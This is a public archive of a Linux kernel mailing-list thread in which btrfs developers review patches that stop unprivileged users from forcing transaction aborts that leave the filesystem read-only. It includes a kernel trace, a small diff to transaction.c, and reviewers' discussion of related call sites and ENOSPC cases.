> > [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3
> > [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750
> > [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820
> > [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0
> > [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5
> > [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000
> > [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0
> > [251067.661972] Call Trace:
> > [251067.662292] <TASK>
> > [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs]
> > [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs]
> > [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs]
> > [251067.665238] ? _raw_spin_unlock+0x15/0x30
> > [251067.665837] ? record_root_in_trans+0xa2/0xd0 [btrfs]
> > [251067.666531] btrfs_mksubvol+0x330/0x580 [btrfs]
> > [251067.667145] btrfs_mksnapshot+0x74/0xa0 [btrfs]
> > [251067.667827] __btrfs_ioctl_snap_create+0x194/0x1d0 [btrfs]
> > [251067.668595] btrfs_ioctl_snap_create_v2+0x107/0x130 [btrfs]
> > [251067.669479] btrfs_ioctl+0x1580/0x2690 [btrfs]
> > [251067.670093] ? count_memcg_events+0x6d/0x180
> > [251067.670849] ? handle_mm_fault+0x1a0/0x2a0
> > [251067.671652] __x64_sys_ioctl+0x92/0xe0
> > [251067.672406] do_syscall_64+0x50/0xf20
> > [251067.673129] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> > [251067.674096] RIP: 0033:0x7f2a495648db
> > [251067.674812] Code: 00 48 89 (...)
> > [251067.678227] RSP: 002b:00007ffc5aa57840 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
> > [251067.679691] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f2a495648db
> > [251067.681145] RDX: 00007ffc5aa588b0 RSI: 0000000050009417 RDI: 0000000000000004
> > [251067.682511] RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000
> > [251067.683842] R10: 000000000000000a R11: 0000000000000246 R12: 00007ffc5aa59910
> > [251067.685176] R13: 00007ffc5aa588b0 R14: 0000000000000004 R15: 0000000000000006
> > [251067.686524] </TASK>
> > [251067.686972] ---[ end trace 0000000000000000 ]---
> > [251067.687890] BTRFS: error (device sdi state A) in create_pending_snapshot:1907: errno=-75 unknown
> > [251067.689049] BTRFS info (device sdi state EA): forced readonly
> > [251067.689054] BTRFS warning (device sdi state EA): Skipping commit of aborted transaction.
> > [251067.690119] BTRFS: error (device sdi state EA) in cleanup_transaction:2043: errno=-75 unknown
> > [251067.702028] BTRFS info (device sdi state EA): last unmount of filesystem 46dc3975-30a2-4a69-a18f-418b859cccda
> >
> > Fix this by ignoring -EOVERFLOW errors from btrfs_uuid_tree_add() in the
> > snapshot creation code when attempting to add the
> > BTRFS_UUID_KEY_RECEIVED_SUBVOL item. This is ok because it's not critical
> > and we are still able to delete the snapshot, as snapshot/subvolume
> > deletion ignores if a BTRFS_UUID_KEY_RECEIVED_SUBVOL is missing (see
> > inode.c:btrfs_delete_subvolume()). As for send/receive, we can still do
> > send/receive operations since it always peeks the first root ID in the
> > existing BTRFS_UUID_KEY_RECEIVED_SUBVOL (it could peek any since all
> > snapshots have the same content), and even if the key is missing, it
> > fallsback to searching by BTRFS_UUID_KEY_SUBVOL key.
> >
> > A test case for fstests will be sent soon.
> >
> > Fixes: dd5f9615fc5c ("Btrfs: maintain subvolume items in the UUID tree")
> > Signed-off-by: Filipe Manana <fdmanana@suse.com>
> > ---
> > fs/btrfs/transaction.c | 16 ++++++++++++++++
> > 1 file changed, 16 insertions(+)
> >
> > diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
> > index 3112bd5520b7..1a0daf2c68fb 100644
> > --- a/fs/btrfs/transaction.c
> > +++ b/fs/btrfs/transaction.c
> > @@ -1902,6 +1902,22 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
> > ret = btrfs_uuid_tree_add(trans, new_root_item->received_uuid,
> > BTRFS_UUID_KEY_RECEIVED_SUBVOL,
> > objectid);
>
> I'm just checking all other btrfs_uuid_tree_add() callsites, and
> wondering if other call sites are also affected:
>
> - _btrfs_ioctl_set_received_subvol()
>
> Would this be affected too?
Can be abused too, but that will require a different fix and out of
the scope of this patch.
And besides btrfs-prog's receive command, there are no wrappers for
the ioctl that I know of.
Will need to create a C program in fstests to craft a reproducer.
Thanks.
>
> Thanks,
> Qu
>
> > + /*
> > + * We are creating of lot of snapshots of the same root that was
> > + * received (has a received UUID) and reached a leaf's limit for
> > + * an item. We can safefly ignore this and avoid a transaction
> > + * abort. A deletion of this snapshot will still work since we
> > + * ignore if an item with a BTRFS_UUID_KEY_RECEIVED_SUBVOL key
> > + * is missing (see btrfs_delete_subvolume()). Send/receive will
> > + * work too since it peeks the first root id from the existing
> > + * item (it could peek any), and in case it's missing it
> > + * falls back to search by BTRFS_UUID_KEY_SUBVOL keys.
> > + * Creation of a snapshot does not require CAP_SYS_ADMIN, so
> > + * we don't want users triggering transaction aborts, either
> > + * intentionally or not.
> > + */
> > + if (ret == -EOVERFLOW)
> > + ret = 0;
> > if (unlikely(ret && ret != -EEXIST)) {
> > btrfs_abort_transaction(trans, ret);
> > goto fail;
>
^ permalink raw reply [flat|nested] 15+ messages in thread
* Re: [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
2026-02-26 21:18 ` Filipe Manana
@ 2026-02-26 21:57 ` Boris Burkov
0 siblings, 0 replies; 15+ messages in thread
From: Boris Burkov @ 2026-02-26 21:57 UTC (permalink / raw)
To: Filipe Manana; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 09:18:06PM +0000, Filipe Manana wrote:
> On Thu, Feb 26, 2026 at 7:09 PM Boris Burkov <boris@bur.io> wrote:
> >
> > On Thu, Feb 26, 2026 at 02:33:57PM +0000, fdmanana@kernel.org wrote:
> > > From: Filipe Manana <fdmanana@suse.com>
> > >
> > > We have a couple scenarios that regular users can exploit to trigger a
> > > transaction abort and turn a filesystem into RO mode, causing some
> > > disruption. The first 2 patches fix these, the remainder are just a few
> > > trivial and cleanups.
> >
> > Bug fixes and cleanups look good. No need to abort in these cases as you
> > have shown.
> > Reviewed-by: Boris Burkov <boris@bur.io>
> >
> > But on the topic of security, or malicious users:
> >
> > How is this sort of attack conceptually different from simply filling
> > up the filesystem with fallocates then doing random metadata operations
> > until we ENOSPC and go readonly?
>
> What makes you think that users causing an ENOSPC that triggers a
> transaction abort isn't an issue?
>
> If we know of any intentional way to trigger that, we should definitely fix it.
> Even some weeks ago I fixed such a case reported by a user when
> running bonnie++:
>
> https://lore.kernel.org/linux-btrfs/SA1PR18MB56922F690C5EC2D85371408B998FA@SA1PR18MB5692.namprd18.prod.outlook.com/
>
> We often see users reporting that sort of issue, but we don't know the
> workloads, how to reproduce and the state of their fs most of the
> time.
>
> >
> > What about if the attacker also exploits the behavior of the extent
> > allocator to try to produce fragmentation driven metadata ENOSPCs
> > aborts?
>
> Do you know of a way to do that?
> If you do, we should fix it.
>
> No matter what a user does, especially a non-privileged user, it
> should not trigger transaction aborts in an easy way (or anything else
> bad, like memory leaks, use-after-frees, NULL pointer derefs, etc).
Fair enough, I like this stance.
Looks like I had too low of an opinion of our intended ENOSPC
guarantees :)
>
> Thanks.
>
> >
> > Thanks,
> > Boris
> >
> > >
> > > Filipe Manana (5):
> > > btrfs: fix transaction abort on file creation due to name hash collision
> > > btrfs: fix transaction abort when snapshotting received subvolumes
> > > btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
> > > btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
> > > btrfs: remove pointless error check in btrfs_check_dir_item_collision()
> > >
> > > fs/btrfs/dir-item.c | 4 +---
> > > fs/btrfs/inode.c | 19 +++++++++++++++++++
> > > fs/btrfs/ioctl.c | 2 +-
> > > fs/btrfs/transaction.c | 18 +++++++++++++++++-
> > > fs/btrfs/uuid-tree.c | 5 +----
> > > 5 files changed, 39 insertions(+), 9 deletions(-)
> > >
> > > --
> > > 2.47.2
> > >
^ permalink raw reply [flat|nested] 15+ messages in thread
* Re: [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
` (5 preceding siblings ...)
2026-02-26 19:10 ` [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode Boris Burkov
@ 2026-02-26 23:10 ` Qu Wenruo
6 siblings, 0 replies; 15+ messages in thread
From: Qu Wenruo @ 2026-02-26 23:10 UTC (permalink / raw)
To: fdmanana, linux-btrfs
在 2026/2/27 01:03, fdmanana@kernel.org 写道:
> From: Filipe Manana <fdmanana@suse.com>
>
> We have a couple scenarios that regular users can exploit to trigger a
> transaction abort and turn a filesystem into RO mode, causing some
> disruption. The first 2 patches fix these, the remainder are just a few
> trivial and cleanups.
>
Reviewed-by: Qu Wenruo <wqu@suse.com>
Thanks,
Qu
> Filipe Manana (5):
> btrfs: fix transaction abort on file creation due to name hash collision
> btrfs: fix transaction abort when snapshotting received subvolumes
> btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
> btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
> btrfs: remove pointless error check in btrfs_check_dir_item_collision()
>
> fs/btrfs/dir-item.c | 4 +---
> fs/btrfs/inode.c | 19 +++++++++++++++++++
> fs/btrfs/ioctl.c | 2 +-
> fs/btrfs/transaction.c | 18 +++++++++++++++++-
> fs/btrfs/uuid-tree.c | 5 +----
> 5 files changed, 39 insertions(+), 9 deletions(-)
>
^ permalink raw reply [flat|nested] 15+ messages in thread
end of thread, other threads:[~2026-02-26 23:10 UTC | newest]
Thread overview: 15+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
2026-02-26 14:33 ` [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision fdmanana
2026-02-26 18:55 ` Boris Burkov
2026-02-26 21:24 ` Filipe Manana
2026-02-26 21:29 ` Boris Burkov
2026-02-26 14:33 ` [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes fdmanana
2026-02-26 20:40 ` Qu Wenruo
2026-02-26 21:30 ` Filipe Manana
2026-02-26 14:34 ` [PATCH 3/5] btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add() fdmanana
2026-02-26 14:34 ` [PATCH 4/5] btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add() fdmanana
2026-02-26 14:34 ` [PATCH 5/5] btrfs: remove pointless error check in btrfs_check_dir_item_collision() fdmanana
2026-02-26 19:10 ` [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode Boris Burkov
2026-02-26 21:18 ` Filipe Manana
2026-02-26 21:57 ` Boris Burkov
2026-02-26 23:10 ` Qu Wenruo
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox